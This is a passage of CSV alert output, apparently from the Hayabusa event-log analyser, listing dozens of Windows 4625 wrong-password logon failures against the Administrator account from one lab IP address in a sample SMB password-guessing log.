NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DNZhcPd1JaNFZMYG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LeOIg10KS60QplWz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.036 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: um3Nwo2doDbKJJvz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.150 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JuoqbUwc2Nth1xlH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.199 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WF8zKIbeboTLLkC6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.237 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kSyKc8igfuYLMekV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.285 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LHog0TdOci9CCKBa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R5ilFaQlemZUSNun : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.374 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JOJnv9vFdqr2VSQC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rXaoVN7FvJ5rRDUF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.482 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kaFCT5QYFfmJpEC1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kOdVfL4XUTLp60tC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wFQSXjz0JTlkwpBu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.634 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sgAVlnENp6IzRRDr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JLkeKKFVP5vJjPtl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.751 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EqLXdGmr45vGpu3E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m7uTpMLqPgenJdRb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FQn7NqRzpGtjQdfv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8F8EZLHQtEWkeob1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5joxW81M9vcAfbJw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.988 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iMfmQF3xsaV5SQVZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.040 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QQe9VL8eeco0SdPW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MnMbxQEuczrnMLKc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.137 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3DWOiTIp6JQLq9Vz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E1ORteg467kiFxmD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.216 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EoVhHZ2lkyAEx0w9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IMSqYaVVGR5v3bXr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.298 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hEEJ05nL0lyatWKL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.349 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SgrcS1NqwVJSEv31 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.395 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CCNTu1A6c6myngXd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.434 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YLx5Hv5GmdvsO9SE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VtS3KUkTVoAWGqbW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.512 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7DxfDEwc6ykrmddu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.552 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m8yKyocZwOY574pe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JfdmcsxnDHRxJYAA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.649 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: euxBOcdse8NjSzTd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dw7RZh5jKuRcM1xw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.742 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zIyozsYA1Mn27gl7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.786 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vhJopROjHZi6T8aF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.822 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QZ6XuZO6fIMg52tV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.870 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tvAYEepvDwz93ezW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.919 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6Er95vLjet49OmSQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.960 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OKkMGZ5on5L26cip : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dp5dq3YYmmLxperL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: klkWqfYoNQQHRISX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q0EekPO3q6qRfq3i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.144 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gfG1x6sL4Aqlj7TK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.185 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: owSUehMmDEhijkfl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.224 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J3xBPT5WiuvmPZHe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.264 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gIufEPz8FBVd5yKe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6Blruxd110NvZjof : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0VsPitzItsjU3Y59 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.460 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HEq6vk4nTe3weSOP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.507 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lE8kvmcQtCmlsqtT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.548 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IXmfjxrGC3liZ2oh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.589 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 72JLcUBrhOoXPLzD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.635 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sRoFpK2ZvBYy4jGM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.676 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9KReiI3k2WIKpxFq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.722 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wsfSzPbji6ARhU0k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: axeCxygvJ4zL4Xoq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.809 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y64sc51Y7vbiFTIQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.853 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o395tRQcfRBTTCSF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.892 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: K1R4wlYWS4SkM3dF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.938 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RsZy0Yjvk720Mu22 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c8RusStjhReKBmS0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.026 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eJuPYLTcGaGvErLg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.069 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: raCbua01mzU1Djuf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Fnt8atAbMtxXivUs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.165 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: psokvQJyMn5m5rMh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.210 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wTPGqOITsOhpTgIF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xxhGrLzhwNziihc9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UIb1lHuPaC62UlBp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.338 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2uvXuLIR9yvmWngF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.382 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MI35CCybjNtntfwo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.426 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0GTJfOkk0fUC5YCX : IP Address: 192.168.198.149 : AuthPackage: 